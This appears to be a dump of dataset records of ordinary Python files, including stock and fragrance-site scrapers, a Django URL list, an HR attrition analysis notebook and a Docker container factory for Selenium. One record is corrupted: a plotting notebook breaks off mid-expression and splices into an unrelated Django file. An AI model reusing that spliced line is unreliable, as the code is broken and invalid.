watch_sheet=\"MostActive_WatchCount\"\n)\n\ntime.sleep(10)\ncrawler = RankingCrawler(\n user_client=\"tommy\", spreadsheet=spreadsheet, category=RankingCategory.WATCHERS\n)\ncrawler.scrape_trending_value(sheet=\"Watchers_NewCount\")\ncrawler.scrape_price_and_follower_count(\n price_sheet=\"Watchers_Price\", watch_sheet=\"Watchers_WatchCount\"\n)\n","repo_name":"ronakHegde98/penny-stockers","sub_path":"stocktwits/scrapers/watchers_active_jobs.py","file_name":"watchers_active_jobs.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"29558573717","text":"get_ipython().magic('pylab inline')\n#from scipy.integrate import ode\n#from scipy.interpolate import interp1d\nfrom dde_state import DDE_state\ndde = DDE_state()\n\nNmax = 10\nts = linspace(0,1,100)\nx0s = 0*ts\nxs = dde.evolve_n(ts,x0s,Nmax)\nfor i in arange(10):\n plot(ts,xs[i],label=i)\nplt.legend()\nplt.show()\n\ndef eigen_eq(z,p):\n return z-p*(1-exp(-z))\n\nxs = linspace(-5,2,600)\nys = linspace(-20,20,600)\n\nXS,YS = meshgrid(xs,ys)\n\nP=2\nZS = eigen_eq(XS+1j*YS,P)\n\nmpl.rcParams['mathtext.fontset'] = 'cm'\nmpl.rcParams['mathtext.bf'] = 'serif:bold'\n\nmpl.rcParams['font.family'] = 'serif'\n#mpl.rcParams['font.style'] = 'cmr'\npcolormesh(XS,YS,angle(ZS))\n\nxs2= linspace(-5,0)\neig_f = P*sqrt(exp(-2*xs2)-(xs2/P-1)**2)\nplot(xs2,eig_f,color='w')\nplot(xs2,-eig_f,color='w')\nylim([ys[0],ys[-1]])\n#clim(0,1)\ncolorbar()\n\n#plt.savefig('eigenvals.png')\n\ndef N(p):\n return exp(-p**2)\n\nA = 1\ndef p0(x):\n return A*x/(2.-x)\n\ndef p1(x):\n return A*tan(x) if x /', RetrieveUpdateDestroyUrgentContactsAPIView.as_view(), name='retrieve-update-destroy-urgent-contacts'),\n]\n","repo_name":"linhfishCR7/hrm-api","sub_path":"urgent_contacts/hrm/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"33664199667","text":"import pandas as pd\r\n\r\n\r\ndata=pd.read_csv(\"datasetoutput.csv\")\r\ntemp=list()\r\ntemp.append(0)\r\nprint(data.shape)\r\nfor i in range(1,data.shape[0]):\r\n temp.append(1)\r\ndata['target']=temp\r\nprint(data)\r\ndata.to_csv(\"D:\\PES6\\Capstone\\Tests\\datasetoutput.csv\")","repo_name":"VishnuJG/CV-Workout","sub_path":"code/funtioning.py","file_name":"funtioning.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"28480583024","text":"#https://www.hackerrank.com/challenges/reduce-function/problem\n#take an array of pairs, reduce to a product for numerator and denominator\n\nfrom fractions import Fraction\nfrom functools import reduce\nfrom random import randint\n\nprint(Fraction(2,5).numerator)\n\n\ndef reduce_fraction(count,fracs):\n print(fracs)\n numerators = [f.numerator for f in fracs]\n denominators = [f.denominator for f in fracs]\n numerator = reduce(lambda s,n: s*n, numerators)\n denominator = reduce(lambda s,n: s*n, denominators)\n low_frac = Fraction(numerator,denominator)\n print(f\"{numerator}/{denominator}\")\n return low_frac.numerator, low_frac.denominator\n\n \n\ncount = 3\n# fractions = [(1,3),(2,6),(3,9)]\nfractions = []\nfor _ in range(10):\n fractions.append(Fraction(randint(1,10),randint(9,20)))\n\nx = reduce_fraction(count,fractions)\nprint(x)\n\n ","repo_name":"ayunas/hacker-rank","sub_path":"reduce_fraction.py","file_name":"reduce_fraction.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"28828391884","text":"import datetime\nimport requests\nimport urllib.request\nfrom bs4 import BeautifulSoup\nimport time\n#class AppURLopener(urllib.request.FancyURLopener):\n# version = \"Mozilla/5.0\"\n\n#opener = AppURLopener()\n#response = opener.open('https://www.fragrantica.com/designers/')\n\n#pageContent = requests.get('https://www.fragrantica.com/designers/')\n#soup = BeautifulSoup(pageContent.content, 'html.parser')\nuser_agent = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7'\n\nurl = \"https://www.fragrantica.com/designers/\"\nheaders={'User-Agent':user_agent,} \n\nrequest=urllib.request.Request(url,None,headers) #The assembled request\nresponse = urllib.request.urlopen(request)\n\n\nsoup = BeautifulSoup(response, 'html.parser')\ndesigners = soup.find_all('div', class_=\"nduList\")\n\nlistDesigners = list(designers)\ni = 0\nj = 0\n\nnow = datetime.datetime.now()\nfileName=now.strftime(\"frag-%Y%m%d-%H%M.csv\")\nf = open(fileName, \"w\")\nShortListDesigner=listDesigners#[:5]\nf.write(\"Number | Designer | Perfume | rating | ratingCount | Comments | Poor | Week| moderate | long lasting | very long lasting | URL\")\nfor designer in ShortListDesigner:\n i = i + 1\n # f.write(str(i) + ' | '+ designer.text+ ' | '+ 'https://www.fragrantica.com'+designer.a['href']+',')\n print(str(i) + ' | ' + designer.text, ' | ' + 'https://www.fragrantica.com' + designer.a['href'])\n #designerPage = requests.get('https://www.fragrantica.com' + designer.a['href'])\n #designersoup = BeautifulSoup(designerPage.content, 'html.parser')\n requestDesigner=urllib.request.Request('https://www.fragrantica.com' + designer.a['href'],None,headers) \n designerPage = urllib.request.urlopen(requestDesigner)\n designersoup = BeautifulSoup(designerPage, 'html.parser')\n perfumes = designersoup.find_all('div', class_=\"perfumeslist\")\n listperfumes =list(perfumes)\n SamplePerfumeList=listperfumes#[:5]\n for perfume in SamplePerfumeList:\n j = j + 1\n print(str(j).zfill(5) + ' ' + perfume.text, end='| ')\n requestPerfume=urllib.request.Request('https://www.fragrantica.com' + perfume.a['href'],None,headers) \n PerfumePage = urllib.request.urlopen(requestPerfume)\n PerfumePagesoup = BeautifulSoup(PerfumePage, 'html.parser')\n ratingValue=\" \" if(PerfumePagesoup.find(itemprop=\"ratingValue\") is None) else PerfumePagesoup.find(itemprop=\"ratingValue\").get_text()\n ratingCount=\" \" if(PerfumePagesoup.find(itemprop=\"ratingCount\") is None) else PerfumePagesoup.find(itemprop=\"ratingCount\").get_text()\n PerfumeReviews=PerfumePagesoup.find_all('div', class_=\"revND\")\n longtivityTable=PerfumePagesoup.find('table', class_=\"voteLS long\")\n longValuesList=list(longtivityTable)\n longValuesCells=longValuesList[3::2]\n Silage=\"\"\n for row in longValuesCells:\n cells= row.find_all(\"td\")\n Cat= cells[0].get_text()\n Val=cells[1].get_text()\n Silage+=Val+ \" | \"\n \n reviwsCount=len(PerfumeReviews)\n print(ratingValue, end =' ')\n print(ratingCount)\n\n info = (str(j).zfill(5) + ' | ' + designer.text + ' | ' + perfume.text + ' | ' + ratingValue+ ' | ' + ratingCount + ' | ' + str(reviwsCount) +' | ' +Silage + 'https://www.fragrantica.com' + perfume.a['href'] + '>').encode(\"utf-8\")\n f.write(str(info))\n time.sleep(1)\nf.close()\n","repo_name":"usamanaem/fragrantica_parser","sub_path":"AllFragsParser.py","file_name":"AllFragsParser.py","file_ext":"py","file_size_in_byte":3395,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"14295553971","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # IBM HR Analytics Employee Attrition & Performance\n# \n# Uncover the factors that lead to employee attrition and explore important questions such as ‘show me a breakdown of distance from home by job role and attrition’ or ‘compare average monthly income by education and attrition’. This is a fictional data set created by IBM data scientists.\n# \n# Education :\n# 'Below College' ,\n# 'College' ,\n# 'Bachelor' ,\n# 'Master' ,\n# 'Doctor'\n# \n# EnvironmentSatisfaction :\n# 'Low' ,\n# 'Medium' ,\n# 'High' ,\n# 'Very High' \n# \n# JobInvolvement :\n# 'Low' ,\n# 'Medium' ,\n# 'High' ,\n# 'Very High'\n# \n# JobSatisfaction :\n# 'Low' ,\n# 'Medium' ,\n# 'High',\n# 'Very High'\n# \n# PerformanceRating\n# 'Low' ,\n# 'Good' ,\n# 'Excellent' ,\n# 'Outstanding'\n# \n# RelationshipSatisfaction :\n# 'Low' ,\n# 'Medium' ,\n# 'High' ,\n# 'Very High'\n# \n# WorkLifeBalance :\n# 'Bad' ,\n# 'Good' ,\n# 'Better' ,\n# 'Best'\n\n# In[ ]:\n\n\nimport numpy as np \nimport pandas as pd \nimport matplotlib.pyplot as plt \nimport seaborn as sb\nimport sklearn \nimport scipy\nimport statsmodels.api as sm\nimport warnings \nwarnings.filterwarnings(\"ignore\")\n\n\n# # Reading dataset\n\n# In[41]:\n\n\ndf = pd.read_csv('IBM HR Analytics Employee Attrition.csv')\ndf.head()\n\n\n# In[42]:\n\n\ndf.shape\n\n\n# # Data perprocessing & EDA\n\n# In[43]:\n\n\ndef dataoveriew(df, message):\n print(f'{message}:\\n')\n print(\"Rows:\", df.shape[0])\n print(\"\\nNumber of features:\", df.shape[1])\n print(\"\\nFeatures:\")\n print(df.columns.tolist())\n print(\"\\nMissing values:\", df.isnull().sum().values.sum())\n print(\"\\nUnique values:\")\n print(df.nunique())\n\n\n# In[44]:\n\n\ndataoveriew(df, 'Overiew of the training dataset')\n\n\n# In[45]:\n\n\n#checking datatypes\ndf.info()\n\n\n# # Dividing the columns into 2 categories (continuous and categorical)\n\n# In[46]:\n\n\ncat =[]\ncon=[]\nfor i in df.columns:\n if df[i].dtypes == \"object\":\n cat.append(i)\n else:\n con.append(i)\n\n\n# In[47]:\n\n\ndf.describe().columns\n\n\n# In[48]:\n\n\ncat_df=df[['Attrition','BusinessTravel','Department','Over18','Gender','OverTime','JobRole','MaritalStatus','EducationField']]\n\n\n# In[49]:\n\n\ncon_df=df[['Age', 'DailyRate', 'DistanceFromHome', 'Education','EmployeeNumber', 'EnvironmentSatisfaction',\n 'HourlyRate','JobInvolvement', 'JobLevel', 'JobSatisfaction', 'MonthlyIncome','MonthlyRate', 'NumCompaniesWorked',\n 'PercentSalaryHike','PerformanceRating', 'RelationshipSatisfaction','StockOptionLevel',\n 'TotalWorkingYears', 'TrainingTimesLastYear','WorkLifeBalance', 'YearsAtCompany', 'YearsInCurrentRole',\n 'YearsSinceLastPromotion', 'YearsWithCurrManager']]\n\n\n# In[50]:\n\n\n# check for missing values \ndf.isnull().sum()\n\n\n# In[51]:\n\n\n# statistical measures of the dataset\ndf.describe()\n\n\n# it seems that some of columns are not normalised \n\n# # visiualizing the data\n\n# In[90]:\n\n\nsb.distplot(df.DistanceFromHome)\nplt.show()\ndf['DistanceFromHome_sqrt']=np.sqrt(df.DistanceFromHome)\nsb.distplot(df.DistanceFromHome_sqrt)\nplt.show()\ndf['DistanceFromHome_log']=np.log(df.DistanceFromHome)\nsb.distplot(df.DistanceFromHome_log)\nplt.show()\n\n\n# In[91]:\n\n\nsb.distplot(df.MonthlyIncome)\nplt.show()\ndf['MonthlyIncome_sqrt']=np.sqrt(df.MonthlyIncome)\nsb.distplot(df.MonthlyIncome_sqrt)\nplt.show()\ndf['MonthlyIncome_log']=np.log(df.MonthlyIncome)\nsb.distplot(df.MonthlyIncome_log)\nplt.show()\n\n\n# In[92]:\n\n\nsb.distplot(df.PercentSalaryHike)\nplt.show()\ndf['PercentSalaryHike_sqrt']=np.sqrt(df.PercentSalaryHike)\nsb.distplot(df.PercentSalaryHike_sqrt)\nplt.show()\ndf['PercentSalaryHike_log']=np.log(df.PercentSalaryHike)\nsb.distplot(df.PercentSalaryHike_log)\nplt.show()\n\n\n# In[93]:\n\n\nsb.distplot(df.YearsAtCompany)\nplt.show()\ndf['YearsAtCompany_sqrt']=np.sqrt(df.YearsAtCompany)\nsb.distplot(df.YearsAtCompany_sqrt)\nplt.show()\n\n\n# In[94]:\n\n\nsb.distplot(df.YearsSinceLastPromotion)\nplt.show()\ndf['YearsSinceLastPromotion_sqrt']=np.sqrt(df.YearsSinceLastPromotion)\nsb.distplot(df.YearsSinceLastPromotion_sqrt)\nplt.show()\n\n\n# # correlation through heatmap\n\n# In[57]:\n\n\ncorr_heatmap= con_df.corr()\nf, ax = plt.subplots(figsize=(20,12))\nsb.heatmap(corr_heatmap,vmax=0.8,annot=True)\n\n\n# In[58]:\n\n\n#show how mush % employees left the organizatin\ndf.Attrition.value_counts(normalize= True)\n\n\n# In[59]:\n\n\nAttrition= df.Attrition.value_counts()\nsb.barplot(x=df.Attrition.index,y=df.Attrition.values)\n\n\n# In[60]:\n\n\ndf['Attrition'].value_counts().plot(kind= \"pie\")\n\n\n# most of them is no so this is class imbalanced problem\n\n# In[61]:\n\n\ndf.OverTime.value_counts(normalize= True)\n\n\n# In[62]:\n\n\nOverTime= df.Attrition.value_counts()\nsb.barplot(x=df.OverTime.index,y=df.OverTime.values)\n\n\n# In[63]:\n\n\ndf['OverTime'].value_counts().plot(kind= \"pie\")\n\n\n# In[64]:\n\n\n#Bar plots\nBarPlot_columns=['Age', 'DistanceFromHome','JobInvolvement','TotalWorkingYears',\n'TrainingTimesLastYear','WorkLifeBalance', 'JobLevel' ,'TotalWorkingYears' , 'YearsInCurrentRole']\n\n\n# In[65]:\n\n\n#method for performing bar plots\ndef Bar_plots(var):\n col = pd.crosstab(df[var],df.Attrition)\n col.div(col.sum(1).astype(float),axis = 0).plot(kind = \"bar\",stacked= False , figsize=(8,4))\n plt.xticks(rotation=90)\n\n\n# In[66]:\n\n\nfor col in BarPlot_columns:\n Bar_plots(col)\n\n\n# # Insights :\n# 1- attrition is very high wih employees between 18 : 22 years old\n# \n# 2- attrition is more when distance of hte office is more from home\n# \n# 3- attrition is high with employees's education in HR field\n# \n# 4- employees wgo work overtime have high attrition than who didn't\n# \n# 5- emploees who are working less than 2 years have more attrition\n\n# # outliers checking and treatment\n\n# In[67]:\n\n\nimport numpy as np\nfrom scipy import stats\n\n\n# In[68]:\n\n\nz= np.abs(stats.zscore(df[['Age', 'DailyRate', 'DistanceFromHome', 'Education','EmployeeNumber', 'EnvironmentSatisfaction',\n 'HourlyRate','JobInvolvement', 'JobLevel', 'JobSatisfaction', 'MonthlyIncome','MonthlyRate', 'NumCompaniesWorked',\n 'PercentSalaryHike','PerformanceRating', 'RelationshipSatisfaction','StockOptionLevel',\n 'TotalWorkingYears', 'TrainingTimesLastYear','WorkLifeBalance', 'YearsAtCompany', 'YearsInCurrentRole',\n 'YearsSinceLastPromotion', 'YearsWithCurrManager']]))\nprint(z)\nthreshold = 3 \nprint(np.where(z>3))\n\n\n# In[69]:\n\n\nprint(z[0][0])\n\n\n# In[70]:\n\n\ndf\n\n\n# # removing outliers\n\n# In[71]:\n\n\ndf_out = df[(z<3).all(axis=1)]\n\n\n# In[77]:\n\n\ndf_out1 =df_out.drop(['DistanceFromHome_sqrt','DistanceFromHome_log',\n 'MonthlyIncome_sqrt','MonthlyIncome_log',\n 'PercentSalaryHike_sqrt','PercentSalaryHike_log'\n ,'YearsAtCompany_sqrt','YearsSinceLastPromotion_sqrt'],axis=1)\n\n\n# In[78]:\n\n\ndf_out1.head()\n\n\n# In[79]:\n\n\ndf_out1.shape\n\n\n# dividing final dataset into categorical and continous variables\n\n# In[80]:\n\n\nnumerical_df= df_out1.select_dtypes(include=np.number)\ncategorical_df= df_out1.select_dtypes(exclude=np.number)\nnumeric_cols =list (numerical_df.columns)\ncategorical_cols = list(categorical_df.columns)\n\n\n# # converting categorical variables to binary\n\n# In[81]:\n\n\ncategorical_df_dummies= pd.get_dummies(df_out1[categorical_cols],drop_first= True)\nfinal_df= pd.concat([categorical_df_dummies,numerical_df],axis=1)\nfinal_df.head()\n\n\n# In[82]:\n\n\nfinal_df.shape\n\n\n# # Creating models:\n\n# In[83]:\n\n\nX=final_df[['BusinessTravel_Travel_Frequently','BusinessTravel_Travel_Rarely',\n 'Department_Research & Development','Department_Sales',\n 'EducationField_Life Sciences','EducationField_Marketing',\n 'EducationField_Medical','EducationField_Other',\n 'EducationField_Technical Degree','StockOptionLevel','TotalWorkingYears',\n 'TrainingTimesLastYear','WorkLifeBalance','YearsAtCompany',\n 'YearsInCurrentRole', 'YearsSinceLastPromotion','YearsWithCurrManager']]\nY= final_df[['Attrition_Yes']]\n\n\n# # train - test - split\n\n# In[ ]:\n\n\nfrom sklearn.model_selection import train_test_split\nxtrain,xtest,ytrain,ytest=train_test_split(X,Y,test_size=0.3,random_state=42)\n\n\n# RandomForestClassifier Model\n\n# In[95]:\n\n\n\n\nfrom sklearn.ensemble import RandomForestClassifier\nrfc = RandomForestClassifier(n_estimators=10,max_depth=4)\nmodel=rfc.fit(xtrain,ytrain)\npred= model.predict(xtest)\n\nfrom sklearn.metrics import confusion_matrix ,accuracy_score\nprint('the confusion matrix \\n',confusion_matrix(ytest['Attrition_Yes'],pred))\nprint('the accuracy of the RandomForestClassifier is',accuracy_score(ytest['Attrition_Yes'],pred))\n\n\n# In[85]:\n\n\nmodel.feature_importances_\n\n\n# In[86]:\n\n\nimport matplotlib.pyplot as plt\nf, ax =plt.subplots(figsize=(10,12))\nplt.barh(X.columns,model.feature_importances_)\n\n\n# LogisticRegression Model\n\n# In[96]:\n\n\nfrom sklearn.linear_model import LogisticRegression\n\nlr = LogisticRegression()\nmodel_lr=lr.fit(xtrain,ytrain)\npred= model_lr.predict(xtest)\n\nfrom sklearn.metrics import confusion_matrix ,accuracy_score\nprint('the confusion matrix \\n',confusion_matrix(ytest['Attrition_Yes'],pred))\nprint('the accuracy of the LogisticRegression is',accuracy_score(ytest['Attrition_Yes'],pred))\n\n\n# DecisionTreeClassifier Model\n\n# In[98]:\n\n\nfrom sklearn.tree import DecisionTreeClassifier\ndtc = DecisionTreeClassifier(criterion='entropy',min_samples_leaf=4)\nmodel_dtc=dtc.fit(xtrain,ytrain)\npred= model_dtc.predict(xtest)\n\nfrom sklearn.metrics import confusion_matrix ,accuracy_score\nprint('the confusion matrix \\n',confusion_matrix(ytest['Attrition_Yes'],pred))\nprint('the accuracy of the DecisionTreeClassifier is',accuracy_score(ytest['Attrition_Yes'],pred))\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Ahmedsaeedd1/IBM-Analytics-Employee-Attrition-Performance","sub_path":"IBM Analytics Employee Attrition & Performance.py","file_name":"IBM Analytics Employee Attrition & Performance.py","file_ext":"py","file_size_in_byte":9567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"21317166915","text":"import logging\nimport time\nfrom abc import abstractmethod\nfrom collections import Mapping\nfrom functools import partial, wraps\n\nimport docker\nimport gevent\nfrom docker.errors import APIError, DockerException, NotFound\nfrom docker.models.containers import Container\nfrom six import string_types\n\nfrom selenium_docker.errors import DockerError, SeleniumDockerException\nfrom selenium_docker.utils import gen_uuid\n\n\ndef check_engine(fn):\n \"\"\" Pre-check our engine connection by sending a ping before our\n intended operation.\n\n Args:\n fn (Callable): wrapped function.\n\n Returns:\n Callable\n\n Example::\n\n @check_engine\n def do_something_with_docker(self):\n # will raise APIError before getting here\n # if there's a problem with the Docker Engine connection.\n return True\n \"\"\"\n\n @wraps(fn)\n def inner(self, *args, **kwargs):\n self.logger.debug('pinging docker engine')\n try:\n self.docker.ping()\n except SeleniumDockerException as e: # pragma: no cover\n self.logger.exception(e, exc_info=True)\n raise e\n else:\n self.logger.debug('pass')\n return fn(self, *args, **kwargs)\n return inner\n\n\nclass ContainerInterface(object):\n \"\"\" Required functionality for implementing a custom object that has an\n underlying container.\n \"\"\"\n\n CONTAINER = None\n\n def __str__(self):\n return '<%s(image=%s)>' % (\n self.__class__.__name__, self.CONTAINER.get('image', 'None'))\n\n @abstractmethod\n def _make_container(self):\n raise NotImplementedError\n\n @abstractmethod\n def close_container(self):\n raise NotImplementedError\n\n @abstractmethod\n def quit(self):\n raise NotImplementedError\n\n\nclass ContainerFactory(object):\n \"\"\" Used as an interface for interacting with Container instances.\n\n Example::\n\n from selenium_docker.base import ContainerFactory\n\n factory = ContainerFactory.get_default_factory('reusable')\n factory.stop_all_containers()\n\n Will attempt to connect to the local Docker Engine, including the word\n ``reusable`` as part of each new container's name. Calling\n ``factory.stop_all_containers()`` will stop and remove containers assocated\n with that namespace.\n\n Reusing the same ``namespace`` value will allow the factory to inherit\n the correct containers from Docker when the program is reset.\n\n Args:\n engine (:obj:`docker.client.DockerClient`): connection to the\n Docker Engine the application will interact with. If ``engine`` is\n ``None`` then :func:`docker.client.from_env` will be called to\n attempt connecting locally.\n namespace (str): common name included in all the new docker containers\n to allow tracking their status and cleaning up reliably.\n make_default (bool): when ``True`` this instance will become the\n default, used as a singleton, when requested via\n :func:`~ContainerFactory.get_default_factory`.\n logger (:obj:`logging.Logger`): logging module Logger instance.\n \"\"\"\n\n DEFAULT = None\n \"\"\":obj:`.ContainerFactory`: singleton instance to a container factory\n that can be used to spawn new containers accross a single connected\n Docker engine.\n \n This is the instance returned by \n :func:`~ContainerFactory.get_default_factory`. \n \"\"\"\n\n __slots__ = ('_containers', '_engine', '_ns', 'logger')\n\n def __init__(self, engine, namespace, make_default=True, logger=None):\n self._containers = {}\n self._engine = engine or docker.from_env()\n self._ns = namespace or gen_uuid(10)\n self.logger = logger or logging.getLogger(\n '%s.ContainerFactory.%s' % (__name__, self._ns))\n\n if make_default and ContainerFactory.DEFAULT is None:\n ContainerFactory.DEFAULT = self\n\n if namespace:\n # we supplied the namespace, we can bootstrap our\n # tracked containers back from the environment\n self._containers = self.get_namespace_containers(namespace)\n\n def __repr__(self):\n return '' % (\n self._engine.api.base_url, self._ns, len(self._containers.keys()))\n\n @property\n def containers(self):\n \"\"\"dict:\n :obj:`~docker.models.containers.Container` instances\n mapped by name.\n \"\"\"\n return self._containers\n\n @property\n def docker(self):\n \"\"\":obj:`docker.client.DockerClient`:\n reference to the connected Docker engine.\n \"\"\"\n return self._engine\n\n @property\n def namespace(self):\n \"\"\"str: ready-only property for this instance's namespace,\n used for generating names.\n \"\"\"\n return self._ns\n\n def __bootstrap(self, container, **kwargs):\n \"\"\" Adds additional attributes and functions to Container instance.\n\n Args:\n container (Container): instance of\n :obj:`~docker.models.containers.Container` that is being\n fixed up with expected values.\n kwargs (dict): arbitrary attribute names and their values to\n attach to the ``container`` instance.\n\n Returns:\n :obj:`~docker.models.containers.Container`:\n the exact instance passed in.\n \"\"\"\n self.logger.debug('bootstrapping container instance to factory')\n c = container\n for k, v in kwargs.items(): # pragma: no cover\n setattr(c, k, v)\n c.started = time.time()\n c.logger = logging.getLogger('%s.%s' % (__name__, kwargs.get('name')))\n c.ns = self._ns\n return c\n\n def as_json(self):\n \"\"\" JSON representation of our factory metadata.\n\n Returns:\n dict:\n that is a :py:func:`json.dumps` compatible dictionary instance.\n \"\"\"\n return {\n '_ref': str(self),\n 'count': len(self.containers)\n }\n\n def gen_name(self, key=None):\n \"\"\" Generate the name of a new container we want to run.\n\n This method is used to keep names consistent as well as to ensure\n the name/identity of the ``ContainerFactory`` is included. When a\n ``ContainerFactory`` is loaded on a machine with containers already\n running with its name it'll inherit those instances to re-manage\n between application runs.\n\n Args:\n key (str): the identifiable portion of a container name. If one\n isn't supplied (the default) then one is randomly generated.\n\n Returns:\n str:\n in the format of ``selenium--``.\n \"\"\"\n return 'selenium-%s-%s' % (self._ns, key or gen_uuid(6))\n\n @classmethod\n def get_default_factory(cls, namespace=None, logger=None):\n \"\"\" Creates a default connection to the local Docker engine.\n\n This ``classmethod`` acts as a singleton. If one hasn't been made it\n will attempt to create it and attach the instance to the class\n definition. Because of this the method is the preferable way to obtain\n the default connection so it doesn't get overwritten or modified by\n accident.\n\n Note:\n By default this method will attempt to connect to the **local**\n Docker engine only. Do not use this when attempting to use\n a remote engine on a different machine.\n\n Args:\n namespace (str): use this namespace if we're creating a new\n default factory instance.\n logger (:obj:`logging.Logger`): instance of logger to attach\n to this factory instance.\n\n Returns:\n :obj:`~.ContainerFactory`: instance to interact with Docker engine.\n \"\"\"\n if cls.DEFAULT is None:\n cls(None, namespace, make_default=True, logger=logger)\n return cls.DEFAULT\n\n @check_engine\n def get_namespace_containers(self, namespace=None):\n \"\"\" Glean the running containers from the environment that are\n using our factory's namespace.\n\n Args:\n namespace (str): word identifying ContainerFactory containers\n represented in the Docker Engine.\n\n Returns:\n dict:\n :obj:`~docker.models.containers.Container` instances\n mapped by name.\n \"\"\"\n if namespace is None:\n namespace = self.namespace\n ret = {}\n for c in self.docker.containers.list():\n if namespace in c.name:\n ret[c.name] = c\n return ret\n\n @check_engine\n def load_image(self, image, tag=None, insecure_registry=False,\n background=False):\n \"\"\" Issue a ``docker pull`` command before attempting to start/run\n containers. This could potentially increase startup time, as well\n as ensure the containers are up-to-date.\n\n Args:\n image (str): name of the container we're downloading.\n tag (str): tag/version of the container.\n insecure_registry (bool): allow downloading image templates from\n insecure Docker registries.\n background (bool): spawn the download in a background thread.\n\n Raises:\n :exc:`docker.errors.DockerException`:\n if anything goes wrong during the image template download.\n\n Returns:\n :obj:`docker.models.images.Image`:\n the Image controlled by the connected Docker engine.\n Containers are spawned based off this template.\n \"\"\"\n if tag is None:\n tag = ''\n if isinstance(image, Mapping):\n image = image.get('image', None)\n if not isinstance(image, string_types):\n raise ValueError('cannot determine image from %s' % type(image))\n\n try:\n self.logger.debug('checking locally for image')\n img = self.docker.images.get(image)\n except NotFound as e:\n self.logger.debug('could not find image locally, %s', image)\n else:\n return img\n\n self.logger.debug('loading image, %s:%s', image, tag or 'latest')\n fn = partial(self.docker.images.pull,\n image,\n tag=tag,\n insecure_registry=insecure_registry,\n stream=True)\n if background:\n gevent.spawn(fn)\n else:\n return fn()\n\n @check_engine\n def scrub_containers(self, *labels):\n \"\"\" Remove **all** containers that were dynamically created.\n\n Args:\n labels (str): labels to include in our search for finding\n containers to scrub from the connected Docker engine.\n\n Returns:\n int: the number of containers stopped and removed.\n \"\"\"\n\n def stop_remove(c):\n try:\n c.stop()\n c.remove()\n except NotFound:\n self.logger.warning('could not find container %s', c.name)\n\n total = 0\n self.logger.debug('scrubbing all containers by library')\n # attempt to stop all the containers normally\n self.stop_all_containers()\n labels = ['browser', 'dynamic'] + list(set(labels))\n threads = []\n found = set()\n # now close all dangling containers\n for label in labels:\n containers = self.docker.containers.list(\n filters={'label': label})\n count = len(containers)\n self.logger.debug(\n 'found %d dangling containers with label %s',\n count, label)\n total += count\n for c in containers:\n if c.name not in found:\n found.add(c.name)\n threads.append(gevent.spawn(stop_remove, c))\n for t in reversed(threads):\n t.join()\n return total\n\n @check_engine\n def start_container(self, spec, **kwargs):\n \"\"\" Creates and runs a new container defined by ``spec``.\n\n Args:\n spec (dict): the specification of our docker container. This\n can include things such as the name, labels, image,\n restart conditions, etc. The built-in driver containers\n already have this defined in their class declaration.\n kwargs ([str, str]): additional arguments that will be added\n to ``spec``; generally dynamic attributes modifying a static\n container definition.\n\n Raises:\n :exc:`docker.errors.DockerException`:\n when there's any problem performing start and run on the\n container we're attemping to create.\n\n Returns:\n :obj:`docker.models.containers.Container`:\n the newly created and managed container instance.\n \"\"\"\n if 'image' not in spec:\n raise DockerException('cannot create container without image')\n\n self.logger.debug('starting container')\n\n name = spec.get('name', kwargs.get('name', self.gen_name()))\n\n for key in kwargs.keys():\n if key not in spec:\n self.logger.debug('updating `%s` in spec', key)\n\n kw = dict(spec)\n kw.update(kwargs)\n kw['name'] = name\n\n try:\n container = self.docker.containers.run(**kw)\n except DockerException as e: # pragma: no cover\n self.logger.exception(e, exc_info=True)\n raise e\n\n # track this container\n self._containers[name] = self.__bootstrap(container)\n self.logger.debug('started container %s', name)\n return container\n\n @check_engine\n def stop_all_containers(self):\n \"\"\" Remove all containers from this namespace.\n\n Raises:\n APIError: when there's a problem communicating with\n the Docker Engine.\n NotFound: when a tracked container cannot be found in\n the Docker Engine.\n\n Returns:\n None\n \"\"\"\n self.logger.debug('stopping all containers')\n for name in list(self.containers.keys()):\n self.stop_container(name=name)\n\n @check_engine\n def stop_container(self, name=None, key=None, timeout=10):\n \"\"\" Remove an individual container by name or key.\n\n Args:\n name (str): name of the container.\n key (str): partial reference to the container. (Optional)\n timeout (int): time in seconds to wait before sending ``SIGKILL``\n to a running container.\n\n Raises:\n ValueError: when ``key`` and ``name`` are both ``None``.\n APIError: when there's a problem communicating with Docker engine.\n NotFound: when no such container by ``name`` exists.\n\n Returns:\n None\n \"\"\"\n e = None # type: Exception\n container = None # type: Container\n if key and not name:\n name = self.gen_name(key=key)\n if not name:\n raise ValueError('`name` and `key` cannot both be None')\n if name not in self.containers:\n self.logger.warning('container %s is not being tracked' % name)\n # we're not tracking the container in our internal state\n # so we need to query the docker engine and see if it's there.\n try:\n container = self.docker.containers.get(name)\n except NotFound as e:\n self.logger.error('cannot find container via docker engine')\n return container\n except APIError as e:\n self.logger.exception(e, exc_info=True)\n raise DockerError(e)\n else:\n container = self.containers.pop(name)\n if e is not None:\n # if we couldn't get a reference to the container through our\n # Factory instance alert that; it means we're leaking Container\n # references.\n self.logger.info('container recovered from engine, not instance')\n self.logger.debug('stopping container %s', name)\n try:\n container.stop(timeout=timeout)\n container.remove(force=True)\n except APIError as e:\n self.logger.error('could not stop container %s', container.name)\n self.logger.exception(e, exc_info=True)\n raise DockerError(e)\n","repo_name":"vivint/selenium-docker","sub_path":"selenium_docker/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":16574,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"38"} +{"seq_id":"71878862509","text":"from utils import database\n\nUSER_CHOICE = \"\"\"\nPlease enter one of the following:\n- 'a' to add a new book\n- 